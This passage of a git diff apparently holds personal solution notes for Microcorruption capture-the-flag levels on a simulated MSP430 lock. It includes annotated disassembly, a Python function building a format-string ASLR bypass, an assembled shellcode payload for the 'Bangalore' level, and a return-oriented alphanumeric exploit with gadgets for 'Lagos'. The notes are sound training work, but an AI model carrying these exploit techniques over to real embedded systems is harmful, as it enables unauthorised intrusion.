|
||||||
|
add #0x8, sp
|
||||||
|
print_wrong_string:
|
||||||
|
mov.b @r13, r12
|
||||||
|
tst.b r12
|
||||||
|
jnz $-0x24 <_aslr_main+0x282>
|
||||||
|
; print newline
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
mov sp, r14
|
||||||
|
|
||||||
|
; r15 = ++r14
|
||||||
|
incd r14
|
||||||
|
push r14
|
||||||
|
pop r15
|
||||||
|
4754:
|
||||||
|
add #0x8, sp
|
||||||
|
pop r10
|
||||||
|
pop r11
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
rand_base_0x35c: <aslr_main>
|
||||||
|
aslr_main:
|
||||||
|
475c: 0e4f mov r15, r14
|
||||||
|
475e: 3e50 8200 add #0x82, r14
|
||||||
|
4762: 8e12 call r14
|
||||||
|
; SR |= 0x00f0
|
||||||
|
4764: 32d0 f000 bis #0xf0, sr
|
||||||
|
4768: 3041 ret
|
||||||
|
|
||||||
|
|
||||||
|
aslr_base_0x36a: <printf>
|
||||||
|
printf:
|
||||||
|
; Save registers
|
||||||
|
push r11
|
||||||
|
push r10
|
||||||
|
push r9
|
||||||
|
push r8
|
||||||
|
push r7
|
||||||
|
push r6
|
||||||
|
push r4
|
||||||
|
; Create a new stack frame of 0xe bytes
|
||||||
|
mov sp, r4
|
||||||
|
add #0xe, r4
|
||||||
|
|
||||||
|
; Get the first argument
|
||||||
|
decd sp
|
||||||
|
mov 0x2(r4), r10
|
||||||
|
mov sp, -0x10(r4)
|
||||||
|
mov r10, r15
|
||||||
|
|
||||||
|
clr r14
|
||||||
|
jmp $+0x18 <__target_1> +3a
|
||||||
|
inc r15
|
||||||
|
cmp.b #0x25, r13
|
||||||
|
jnz $+0x10 <__target_1> +3a
|
||||||
|
cmp.b @r15, r13
|
||||||
|
jnz $+0x8 <__target_2> +36
|
||||||
|
__target_4:
|
||||||
|
inc r15
|
||||||
|
clr r13
|
||||||
|
jmp $+0x4 <__target_3> +38
|
||||||
|
__target_2:
|
||||||
|
mov #0x1, r13
|
||||||
|
add r13, r14
|
||||||
|
__target_3:
|
||||||
|
mov.b @r15, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x1a <__target_4> +24
|
||||||
|
mov r14, r15
|
||||||
|
add r15, r15
|
||||||
|
incd r15
|
||||||
|
sub r15, sp
|
||||||
|
mov sp, r11
|
||||||
|
mov r4, r12
|
||||||
|
add #0x4, r12
|
||||||
|
mov sp, r15
|
||||||
|
clr r13
|
||||||
|
jmp $+0xc <printf+0x5e>
|
||||||
|
mov @r12, 0x0(r15)
|
||||||
|
inc r13
|
||||||
|
incd r15
|
||||||
|
incd r12
|
||||||
|
cmp r14, r13
|
||||||
|
jl $-0xc <printf+0x54>
|
||||||
|
clr r12
|
||||||
|
mov #0x9, r6
|
||||||
|
mov r12, r13
|
||||||
|
mov #0x25, r7
|
||||||
|
jmp $+0xf8 <printf+0x166>
|
||||||
|
inc r10
|
||||||
|
cmp.b #0x25, r15
|
||||||
|
jz $+0x26 <printf+0x9c>
|
||||||
|
inc r12
|
||||||
|
|
||||||
|
__target_1:
|
||||||
|
mov.b r15, r14
|
||||||
|
sxt r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
jmp $+0xcc <printf+0x166>
|
||||||
|
mov.b @r10, r14
|
||||||
|
cmp.b r15, r14
|
||||||
|
jnz $+0x22 <printf+0xc2>
|
||||||
|
inc r12
|
||||||
|
push r13
|
||||||
|
push r7
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
jmp $+0xa2 <printf+0x162>
|
||||||
|
cmp.b #0x73, r14
|
||||||
|
jnz $+0x32 <printf+0xf8>
|
||||||
|
mov @r11, r14
|
||||||
|
clr r8
|
||||||
|
jmp $+0x24 <printf+0xf0>
|
||||||
|
inc r12
|
||||||
|
inc r14
|
||||||
|
sxt r9
|
||||||
|
push r8
|
||||||
|
push r9
|
||||||
|
push r8
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r8, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
mov.b @r14, r9
|
||||||
|
tst.b r9
|
||||||
|
jnz $-0x26 <printf+0xce>
|
||||||
|
jmp $+0x6c <printf+0x162>
|
||||||
|
cmp.b #0x78, r14
|
||||||
|
jnz $+0x5a <printf+0x156>
|
||||||
|
mov @r11, r14
|
||||||
|
mov #0x4, r9
|
||||||
|
jmp $+0x4a <printf+0x14c>
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
and #0xff, r15
|
||||||
|
clrc
|
||||||
|
rrc r15
|
||||||
|
rra r15
|
||||||
|
rra r15
|
||||||
|
rra r15
|
||||||
|
cmp r15, r6
|
||||||
|
jl $+0xa <printf+0x122>
|
||||||
|
mov r15, r8
|
||||||
|
add #0x30, r8
|
||||||
|
jmp $+0x8 <printf+0x128>
|
||||||
|
mov r15, r8
|
||||||
|
add #0x57, r8
|
||||||
|
push r13
|
||||||
|
push r8
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add #-0x1, r9
|
||||||
|
cmp #-0x1, r9
|
||||||
|
jnz $-0x4c <printf+0x104>
|
||||||
|
add #0x4, r12
|
||||||
|
jmp $+0xe <printf+0x162>
|
||||||
|
cmp.b #0x6e, r14
|
||||||
|
jnz $+0x8 <printf+0x162>
|
||||||
|
mov @r11, r15
|
||||||
|
mov r12, 0x0(r15)
|
||||||
|
incd r11
|
||||||
|
inc r10
|
||||||
|
mov.b @r10, r15
|
||||||
|
tst.b r15
|
||||||
|
jnz $-0xfa <printf+0x70>
|
||||||
|
mov -0x10(r4), sp
|
||||||
|
incd sp
|
||||||
|
pop r4
|
||||||
|
pop r6
|
||||||
|
pop r7
|
||||||
|
pop r8
|
||||||
|
pop r9
|
||||||
|
pop r10
|
||||||
|
pop r11
|
||||||
|
ret
|
||||||
|
|
||||||
|
;;;
|
||||||
|
def bypass (printf_loc):
|
||||||
|
aslr_base = printf_loc - 0x36a;
|
||||||
|
print(b'%n%x'.hex())
|
||||||
|
print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}")
|
||||||
|
;;;
|
||||||
|
|
||||||
|
aslr_base_0x4ec: <_INT>
|
||||||
|
_INT:
|
||||||
|
48ec: 1e41 0200 mov 0x2(sp), r14
|
||||||
|
48f0: 0212 push sr
|
||||||
|
48f2: 0f4e mov r14, r15
|
||||||
|
aslr_base_0x4f4:
|
||||||
|
48f4: 8f10 swpb r15
|
||||||
|
48f6: 024f mov r15, sr
|
||||||
|
48f8: 32d0 0080 bis #0x8000, sr
|
||||||
|
48fc: b012 1000 call #0x10
|
||||||
|
4900: 3241 pop sr
|
||||||
|
4902: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x504: <INT>
|
||||||
|
INT:
|
||||||
|
4904: 0c4f mov r15, r12
|
||||||
|
4906: 0d12 push r13
|
||||||
|
4908: 0e12 push r14
|
||||||
|
490a: 0c12 push r12
|
||||||
|
490c: 0012 push pc
|
||||||
|
490e: 0212 push sr
|
||||||
|
4910: 0f4c mov r12, r15
|
||||||
|
4912: 8f10 swpb r15
|
||||||
|
4914: 024f mov r15, sr
|
||||||
|
4916: 32d0 0080 bis #0x8000, sr
|
||||||
|
491a: b012 1000 call #0x10
|
||||||
|
491e: 3241 pop sr
|
||||||
|
4920: 3152 add #0x8, sp
|
||||||
|
4922: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x524: <putchar>
|
||||||
|
putchar:
|
||||||
|
4924: 0e4f mov r15, r14
|
||||||
|
4926: 0d43 clr r13
|
||||||
|
4928: 0d12 push r13
|
||||||
|
492a: 0e12 push r14
|
||||||
|
492c: 0d12 push r13
|
||||||
|
492e: 0012 push pc
|
||||||
|
4930: 0212 push sr
|
||||||
|
4932: 0f4d mov r13, r15
|
||||||
|
4934: 8f10 swpb r15
|
||||||
|
4936: 024f mov r15, sr
|
||||||
|
4938: 32d0 0080 bis #0x8000, sr
|
||||||
|
493c: b012 1000 call #0x10
|
||||||
|
4940: 3241 pop sr
|
||||||
|
4942: 3152 add #0x8, sp
|
||||||
|
4944: 0f4e mov r14, r15
|
||||||
|
4946: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x548: <getchar>
|
||||||
|
getchar:
|
||||||
|
4948: 2183 decd sp
|
||||||
|
494a: 0d43 clr r13
|
||||||
|
494c: 1e43 mov #0x1, r14
|
||||||
|
494e: 0c41 mov sp, r12
|
||||||
|
4950: 0d12 push r13
|
||||||
|
4952: 0c12 push r12
|
||||||
|
4954: 0e12 push r14
|
||||||
|
4956: 0012 push pc
|
||||||
|
4958: 0212 push sr
|
||||||
|
495a: 0f4e mov r14, r15
|
||||||
|
495c: 8f10 swpb r15
|
||||||
|
495e: 024f mov r15, sr
|
||||||
|
4960: 32d0 0080 bis #0x8000, sr
|
||||||
|
4964: b012 1000 call #0x10
|
||||||
|
4968: 3241 pop sr
|
||||||
|
496a: 3152 add #0x8, sp
|
||||||
|
496c: 6f41 mov.b @sp, r15
|
||||||
|
496e: 8f11 sxt r15
|
||||||
|
4970: 2153 incd sp
|
||||||
|
4972: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x574: <getsn>
|
||||||
|
getsn:
|
||||||
|
4974: 0d4f mov r15, r13
|
||||||
|
4976: 2c43 mov #0x2, r12
|
||||||
|
4978: 0e12 push r14
|
||||||
|
497a: 0d12 push r13
|
||||||
|
497c: 0c12 push r12
|
||||||
|
497e: 0012 push pc
|
||||||
|
4980: 0212 push sr
|
||||||
|
4982: 0f4c mov r12, r15
|
||||||
|
4984: 8f10 swpb r15
|
||||||
|
4986: 024f mov r15, sr
|
||||||
|
4988: 32d0 0080 bis #0x8000, sr
|
||||||
|
498c: b012 1000 call #0x10
|
||||||
|
4990: 3241 pop sr
|
||||||
|
4992: 3152 add #0x8, sp
|
||||||
|
4994: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x596: <puts>
|
||||||
|
puts:
|
||||||
|
4996: 0e4f mov r15, r14
|
||||||
|
4998: 0c43 clr r12
|
||||||
|
499a: 103c jmp $+0x22 <puts+0x26>
|
||||||
|
499c: 1e53 inc r14
|
||||||
|
499e: 8d11 sxt r13
|
||||||
|
49a0: 0c12 push r12
|
||||||
|
49a2: 0d12 push r13
|
||||||
|
49a4: 0c12 push r12
|
||||||
|
49a6: 0012 push pc
|
||||||
|
49a8: 0212 push sr
|
||||||
|
49aa: 0f4c mov r12, r15
|
||||||
|
49ac: 8f10 swpb r15
|
||||||
|
49ae: 024f mov r15, sr
|
||||||
|
49b0: 32d0 0080 bis #0x8000, sr
|
||||||
|
49b4: b012 1000 call #0x10
|
||||||
|
49b8: 3241 pop sr
|
||||||
|
49ba: 3152 add #0x8, sp
|
||||||
|
49bc: 6d4e mov.b @r14, r13
|
||||||
|
49be: 4d93 tst.b r13
|
||||||
|
49c0: ed23 jnz $-0x24 <puts+0x6>
|
||||||
|
49c2: 0e43 clr r14
|
||||||
|
49c4: 3d40 0a00 mov #0xa, r13
|
||||||
|
49c8: 0e12 push r14
|
||||||
|
49ca: 0d12 push r13
|
||||||
|
49cc: 0e12 push r14
|
||||||
|
49ce: 0012 push pc
|
||||||
|
49d0: 0212 push sr
|
||||||
|
49d2: 0f4e mov r14, r15
|
||||||
|
49d4: 8f10 swpb r15
|
||||||
|
49d6: 024f mov r15, sr
|
||||||
|
49d8: 32d0 0080 bis #0x8000, sr
|
||||||
|
49dc: b012 1000 call #0x10
|
||||||
|
49e0: 3241 pop sr
|
||||||
|
49e2: 3152 add #0x8, sp
|
||||||
|
49e4: 0f4e mov r14, r15
|
||||||
|
49e6: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x5e8: <_memcpy>
|
||||||
|
memcpy:
|
||||||
|
49e8: 1c41 0600 mov 0x6(sp), r12
|
||||||
|
49ec: 0f43 clr r15
|
||||||
|
49ee: 093c jmp $+0x14 <_memcpy+0x1a>
|
||||||
|
49f0: 1e41 0200 mov 0x2(sp), r14
|
||||||
|
49f4: 0e5f add r15, r14
|
||||||
|
49f6: 1d41 0400 mov 0x4(sp), r13
|
||||||
|
49fa: 0d5f add r15, r13
|
||||||
|
49fc: ee4d 0000 mov.b @r13, 0x0(r14)
|
||||||
|
4a00: 1f53 inc r15
|
||||||
|
4a02: 0f9c cmp r12, r15
|
||||||
|
4a04: f523 jnz $-0x14 <_memcpy+0x8>
|
||||||
|
4a06: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_608: <_bzero>
|
||||||
|
bzero:
|
||||||
|
4a08: 0d43 clr r13
|
||||||
|
4a0a: 053c jmp $+0xc <_bzero+0xe>
|
||||||
|
4a0c: 0c4f mov r15, r12
|
||||||
|
4a0e: 0c5d add r13, r12
|
||||||
|
4a10: cc43 0000 mov.b #0x0, 0x0(r12)
|
||||||
|
4a14: 1d53 inc r13
|
||||||
|
4a16: 0d9e cmp r14, r13
|
||||||
|
4a18: f923 jnz $-0xc <_bzero+0x4>
|
||||||
|
4a1a: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x61c: <rand>
|
||||||
|
rand:
|
||||||
|
4a1c: 0e43 clr r14
|
||||||
|
4a1e: 3d40 2000 mov #0x20, r13
|
||||||
|
4a22: 0e12 push r14
|
||||||
|
4a24: 0e12 push r14
|
||||||
|
4a26: 0d12 push r13
|
||||||
|
4a28: 0012 push pc
|
||||||
|
4a2a: 0212 push sr
|
||||||
|
4a2c: 0f4d mov r13, r15
|
||||||
|
4a2e: 8f10 swpb r15
|
||||||
|
4a30: 024f mov r15, sr
|
||||||
|
4a32: 32d0 0080 bis #0x8000, sr
|
||||||
|
4a36: b012 1000 call #0x10
|
||||||
|
4a3a: 3241 pop sr
|
||||||
|
4a3c: 3152 add #0x8, sp
|
||||||
|
4a3e: 0f4f mov r15, r15
|
||||||
|
4a40: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x642: <conditional_unlock_door>
|
||||||
|
conditional_unlock_door:
|
||||||
|
4a42: 2183 decd sp
|
||||||
|
4a44: 0e4f mov r15, r14
|
||||||
|
4a46: 3d40 7e00 mov #0x7e, r13
|
||||||
|
4a4a: 0c41 mov sp, r12
|
||||||
|
4a4c: 0c12 push r12
|
||||||
|
4a4e: 0e12 push r14
|
||||||
|
4a50: 0d12 push r13
|
||||||
|
4a52: 0012 push pc
|
||||||
|
4a54: 0212 push sr
|
||||||
|
4a56: 0f4d mov r13, r15
|
||||||
|
4a58: 8f10 swpb r15
|
||||||
|
4a5a: 024f mov r15, sr
|
||||||
|
4a5c: 32d0 0080 bis #0x8000, sr
|
||||||
|
4a60: b012 1000 call #0x10
|
||||||
|
4a64: 3241 pop sr
|
||||||
|
4a66: 3152 add #0x8, sp
|
||||||
|
4a68: 0f43 clr r15
|
||||||
|
4a6a: 2153 incd sp
|
||||||
|
4a6c: 3041 ret
|
||||||
|
4a6e <_unexpected_>
|
||||||
|
4a6e: 0013 reti pc
|
38
15 - Bangalore/Bangalore notes.asm
Normal file
38
15 - Bangalore/Bangalore notes.asm
Normal file
@ -0,0 +1,38 @@
|
|||||||
|
.msp430
|
||||||
|
.bss
|
||||||
|
|
||||||
|
at return, r14 is #000a
|
||||||
|
|
||||||
|
|
||||||
|
; padding
|
||||||
|
[41414141414141414141414141414141]
|
||||||
|
|
||||||
|
; fake stack pages:
|
||||||
|
page1:
|
||||||
|
ba4440000000 ; set page executable;; payload
|
||||||
|
page2:
|
||||||
|
400a:
|
||||||
|
0640
|
||||||
|
|
||||||
|
; payload
|
||||||
|
31800600324000ffb0121000
|
||||||
|
|
||||||
|
; assembled payload:
|
||||||
|
41414141414141414141414141414141ba4440000000064031800600324000ffb0121000
|
||||||
|
|
||||||
|
32420800b0121000:
|
||||||
|
mov #8f00, sr
|
||||||
|
call #0x10
|
||||||
|
|
||||||
|
.text
|
||||||
|
3f403f80591b024fb0121000:
|
||||||
|
mov #ff01, r15
|
||||||
|
sub #7001, r15
|
||||||
|
mov r15, sr
|
||||||
|
call #0x10
|
||||||
|
|
||||||
|
|
||||||
|
32403280591bb0121000:
|
||||||
|
mov #ff01, sr
|
||||||
|
sub #7001,sr
|
||||||
|
call #0x10
|
15
16 - Lagos/Lagos Solution.asm
Normal file
15
16 - Lagos/Lagos Solution.asm
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
.msp430
|
||||||
|
|
||||||
|
|
||||||
|
.text 0x25c0
|
||||||
|
exploit:
|
||||||
|
mov #0xff00, sr
|
||||||
|
call #0010
|
||||||
|
|
||||||
|
.text 0x4444
|
||||||
|
setup:
|
||||||
|
; sub 0x1e40, sp
|
||||||
|
add #0x674a, sp
|
||||||
|
add #0x7a7a, sp
|
||||||
|
; br &sp
|
||||||
|
ret
|
66
16 - Lagos/Lagos notes.asm
Normal file
66
16 - Lagos/Lagos notes.asm
Normal file
@ -0,0 +1,66 @@
|
|||||||
|
; Goal: execute code from 0x25b6
|
||||||
|
|
||||||
|
; stack buffer: 43ed
|
||||||
|
; mem buffer: 2400
|
||||||
|
|
||||||
|
passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]
|
||||||
|
|
||||||
|
retval = 0x4430 ; &bootstrapper
|
||||||
|
pcoffset = 0x2443-0x4430 ; &realfunc - retval
|
||||||
|
padding = "A"*0x30 + "1" ; alignment
|
||||||
|
bootstrapper = subc @sp+, pc ; 3071
|
||||||
|
|
||||||
|
|
||||||
|
'passwordpassword1' + 'D0' + '??' + '0' + [realfunc][padding]0[bootstrapper]
|
||||||
|
|
||||||
|
bootstrapper:
|
||||||
|
add @sp+, r15
|
||||||
|
|
||||||
|
realfunc:
|
||||||
|
push #0x7f
|
||||||
|
call 45fc
|
||||||
|
|
||||||
|
3012 7e00 b012 fc45
|
||||||
|
|
||||||
|
; Step 1: Create a bootstrapper out of alphanumeric characters, and store it on the stack
|
||||||
|
; this instruction pops a value off the stack and subtracts it from pc. Perfect for
|
||||||
|
subc @sp+, pc
|
||||||
|
|
||||||
|
b'passwordpassword1'+(b'\x30\x71'*0x1a4)+b'00000000000000'
|
||||||
|
|
||||||
|
code snippets:
|
||||||
|
; pop to register
|
||||||
|
3n413041 ; nA0A
|
||||||
|
pop Rn
|
||||||
|
ret
|
||||||
|
|
||||||
|
; popadd to register
|
||||||
|
add @sp+, rN ; nq0A
|
||||||
|
ret
|
||||||
|
|
||||||
|
32413041 ; 2A0A
|
||||||
|
pop sr
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
ROP gadgets:
|
||||||
|
|
||||||
|
Pop sr
|
||||||
|
|
||||||
|
|
||||||
|
Move byte relative to R4 into r15
|
||||||
|
4464 ("Dd"):
|
||||||
|
mov.b -0x4(r4), r15
|
||||||
|
sxt r15
|
||||||
|
add #0x8, sp
|
||||||
|
pop r4
|
||||||
|
ret
|
||||||
|
|
||||||
|
Pop r4:
|
||||||
|
446c ("Dl")
|
||||||
|
pop r4
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
passwordpassword1DlDd
|
64
16 - Lagos/Lagos.asm
Normal file
64
16 - Lagos/Lagos.asm
Normal file
@ -0,0 +1,64 @@
|
|||||||
|
|
||||||
|
login:
|
||||||
|
; calling convention
|
||||||
|
455e: 0b12 push r11
|
||||||
|
; print message
|
||||||
|
4560: 3150 f0ff add #0xfff0, sp
|
||||||
|
4564: 3f40 7044 mov #0x4470 "Enter the password to continue.", r15
|
||||||
|
4568: b012 6046 call #0x4660 <puts>
|
||||||
|
456c: 3f40 9044 mov #0x4490 "Remember: passwords are between 8 and 16 characters.", r15
|
||||||
|
4570: b012 6046 call #0x4660 <puts>
|
||||||
|
4574: 3f40 c544 mov #0x44c5 "Due to some users abusing our login system, we have", r15
|
||||||
|
4578: b012 6046 call #0x4660 <puts>
|
||||||
|
457c: 3f40 f944 mov #0x44f9 "restricted passwords to only alphanumeric characters.", r15
|
||||||
|
4580: b012 6046 call #0x4660 <puts>
|
||||||
|
; Move 0x200 B from stdin to 0x2400
|
||||||
|
4584: 3e40 0002 mov #0x200, r14
|
||||||
|
4588: 3f40 0024 mov #0x2400, r15
|
||||||
|
458c: b012 5046 call #0x4650 <getsn>
|
||||||
|
; set up registers
|
||||||
|
4590: 5f42 0024 mov.b &0x2400, r15
|
||||||
|
4594: 0e43 clr r14
|
||||||
|
4596: 7c40 0900 mov.b #0x9, r12
|
||||||
|
459a: 7d40 1900 mov.b #0x19, r13
|
||||||
|
; jump into loop
|
||||||
|
459e: 073c jmp $+0x10 <login+0x50>
|
||||||
|
; Get a character
|
||||||
|
45a0: 0b41 mov sp, r11
|
||||||
|
45a2: 0b5e add r14, r11
|
||||||
|
45a4: cb4f 0000 mov.b r15, 0x0(r11)
|
||||||
|
; move the character to
|
||||||
|
45a8: 5f4e 0024 mov.b 0x2400(r14), r15
|
||||||
|
45ac: 1e53 inc r14
|
||||||
|
login_0x50:
|
||||||
|
45ae: 4b4f mov.b r15, r11
|
||||||
|
45b0: 7b50 d0ff add.b #0xffd0, r11
|
||||||
|
45b4: 4c9b cmp.b r11, r12
|
||||||
|
45b6: f42f jc $-0x16 <login+0x42>
|
||||||
|
45b8: 7b50 efff add.b #0xffef, r11
|
||||||
|
45bc: 4d9b cmp.b r11, r13
|
||||||
|
45be: f02f jc $-0x1e <login+0x42>
|
||||||
|
45c0: 7b50 e0ff add.b #0xffe0, r11
|
||||||
|
45c4: 4d9b cmp.b r11, r13
|
||||||
|
45c6: ec2f jc $-0x26 <login+0x42>
|
||||||
|
|
||||||
|
; Delete the byte at the unalignment position
|
||||||
|
45c8: c143 0000 mov.b #0x0, 0x0(sp)
|
||||||
|
|
||||||
|
; Reset the temporary buffer to all 0
|
||||||
|
45cc: 3d40 0002 mov #0x200, r13
|
||||||
|
45d0: 0e43 clr r14
|
||||||
|
45d2: 3f40 0024 mov #0x2400, r15
|
||||||
|
45d6: b012 8c46 call #0x468c <memset>
|
||||||
|
45da: 0f41 mov sp, r15
|
||||||
|
45dc: b012 4644 call #0x4446 <conditional_unlock_door>
|
||||||
|
45e0: 0f93 tst r15
|
||||||
|
45e2: 0324 jz $+0x8 <login+0x8c>
|
||||||
|
45e4: 3f40 2f45 mov #0x452f "Access granted.", r15
|
||||||
|
45e8: 023c jmp $+0x6 <login+0x90>
|
||||||
|
45ea: 3f40 3f45 mov #0x453f "That password is not correct.", r15
|
||||||
|
45ee: b012 6046 call #0x4660 <puts>
|
||||||
|
45f2: 3150 1000 add #0x10, sp
|
||||||
|
; calling convention
|
||||||
|
45f6: 3b41 pop r11
|
||||||
|
45f8: 3041 ret
|
249
16 - Lagos/disassemble.py
Normal file
249
16 - Lagos/disassemble.py
Normal file
@ -0,0 +1,249 @@
|
|||||||
|
|
||||||
|
|
||||||
|
# Copied from MSProbe/msprobe.py
|
||||||
|
|
||||||
|
PC = 0 #Incremented by each disassembled instruction, incremented in words NOT bytes
|
||||||
|
asm = [0x7f7f, 0x4242, 0x4343] # fuck you *hardcodes your instructions
|
||||||
|
output = {}
|
||||||
|
|
||||||
|
register_names = ['pc', 'sp', 'sr', 'cg', 'r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
|
||||||
|
|
||||||
|
def dis_int(i: int, e: str = 'big'):
|
||||||
|
dis_bytes(i.to_bytes(6,'big'), e)
|
||||||
|
|
||||||
|
def dis_bytes(b: bytes, e: str = 'big'):
|
||||||
|
global PC, asm
|
||||||
|
asm[0] = int.from_bytes(b[0:2], e)
|
||||||
|
asm[1] = int.from_bytes(b[2:4], e)
|
||||||
|
asm[2] = int.from_bytes(b[4:6], e)
|
||||||
|
PC = 0
|
||||||
|
return disassemble(asm[PC])
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def bitrep(number, bits = 16):
|
||||||
|
"""Converts to binary form, fixing leading zeroes."""
|
||||||
|
mask = int('0b' + '1' * bits, 2)
|
||||||
|
binstr = str(bin(number & mask))[2:]
|
||||||
|
#negative = binstr[0] == '-'
|
||||||
|
bitcount = len(binstr)
|
||||||
|
leading0s = bits - bitcount
|
||||||
|
return ('0' * leading0s) + binstr
|
||||||
|
|
||||||
|
def hexrep(number, zeroes = 4):
|
||||||
|
"""Converts to hex form, fixing leading zeroes."""
|
||||||
|
mask = int('0b' + '1' * (zeroes * 4), 2)
|
||||||
|
hexstr = hex(number & mask)[2:]
|
||||||
|
hexcount = len(hexstr)
|
||||||
|
leading0s = zeroes - hexcount
|
||||||
|
return ('0' * leading0s) + hexstr
|
||||||
|
|
||||||
|
def disassemble(instruction):
|
||||||
|
"""Main disassembly, calls other disassembly functions given a 2-byte instruction."""
|
||||||
|
#Let's start by getting the binary representation.
|
||||||
|
#Need to invert bytes because little endian.
|
||||||
|
ins = bitrep(instruction)
|
||||||
|
#What kind of instruction are we dealing with?
|
||||||
|
if ins[0:3] == '001':
|
||||||
|
return disassemble_jump_instruction(ins)
|
||||||
|
elif ins[0:6] == '000100':
|
||||||
|
return disassemble_one_word_instruction(ins)
|
||||||
|
else:
|
||||||
|
return disassemble_two_word_instruction(ins)
|
||||||
|
|
||||||
|
one_word_opcodes = ['rrc', 'swpb', 'rra', 'sxt', 'push', 'call', 'reti']
|
||||||
|
def disassemble_one_word_instruction(ins):
|
||||||
|
"""Given a one-operand (format I) instruction in a 16-bit string, output disassembly."""
|
||||||
|
global PC #Get PC
|
||||||
|
|
||||||
|
bytemode = '.b' if ins[9] == '1' else ''
|
||||||
|
opcodeID = int(ins[6:9], 2)
|
||||||
|
opcode = one_word_opcodes[opcodeID]
|
||||||
|
reg = int(ins[12:], 2)
|
||||||
|
|
||||||
|
adrmode = int(ins[10:12], 2)
|
||||||
|
reg_output, extensionWord = disassemble_addressing_mode(reg, adrmode)
|
||||||
|
|
||||||
|
PC += 1 + (1 if extensionWord else 0)
|
||||||
|
|
||||||
|
return opcode + bytemode + ' ' + reg_output
|
||||||
|
|
||||||
|
jump_opcodes = ['jne', 'jeq', 'jlo', 'jhs', 'jn ', 'jge', 'jl ', 'jmp']
|
||||||
|
def disassemble_jump_instruction(ins):
|
||||||
|
"""Given a jump instruction (format II) in a 16-bit string, output disassembly."""
|
||||||
|
global PC #Get PC
|
||||||
|
|
||||||
|
condition = int(ins[3:6], 2) #Get condition code from bits
|
||||||
|
#Sign extend
|
||||||
|
offset = ins[6] * 6 + ins[6:]
|
||||||
|
sign_subtract = 65536 if offset[0] == '1' else 0 #Sign bit
|
||||||
|
pcOffset = ((int(offset, 2) - sign_subtract) * 2) + 2
|
||||||
|
|
||||||
|
#Add a plus if it's not negative for readability
|
||||||
|
plus = '+' if sign_subtract == 0 else ''
|
||||||
|
|
||||||
|
PC += 1
|
||||||
|
|
||||||
|
return jump_opcodes[condition] + ' ' + plus + hex(pcOffset)
|
||||||
|
|
||||||
|
#Two-operand opcodes start at 4 (0b0100)
|
||||||
|
two_word_opcodes = ['!!!', '!!!', '!!!', '!!!', 'mov', 'add', 'addc', 'subc', 'sub', 'cmp', 'dadd', 'bit', 'bic', 'bis', 'xor', 'and']
|
||||||
|
def disassemble_two_word_instruction(ins):
|
||||||
|
"""Given a two-operand instruction (format III) in a 16-bit string, output disassembly."""
|
||||||
|
global PC #Get PC
|
||||||
|
|
||||||
|
bytemode = '.b' if ins[9] == '1' else ''
|
||||||
|
opcodeID = int(ins[0:4], 2)
|
||||||
|
opcode = two_word_opcodes[opcodeID]
|
||||||
|
|
||||||
|
srcReg = int(ins[4:8], 2)
|
||||||
|
srcAdrMode = int(ins[10:12], 2)
|
||||||
|
|
||||||
|
reg_output_src, extWordSrc = disassemble_addressing_mode(srcReg, srcAdrMode)
|
||||||
|
PC += 1 if extWordSrc else 0
|
||||||
|
|
||||||
|
dstReg = int(ins[12:], 2)
|
||||||
|
dstAdrMode = int(ins[8], 2)
|
||||||
|
|
||||||
|
reg_output_dst, ext_word_dst = disassemble_addressing_mode(dstReg, dstAdrMode)
|
||||||
|
PC += 1 if ext_word_dst else 0
|
||||||
|
|
||||||
|
PC += 1 #Instruction word
|
||||||
|
|
||||||
|
finalins = opcode + bytemode + ' ' + reg_output_src + ', ' + reg_output_dst
|
||||||
|
|
||||||
|
#Disassemble pseudo (emulated) instructions
|
||||||
|
|
||||||
|
#These are the easy ones to catch
|
||||||
|
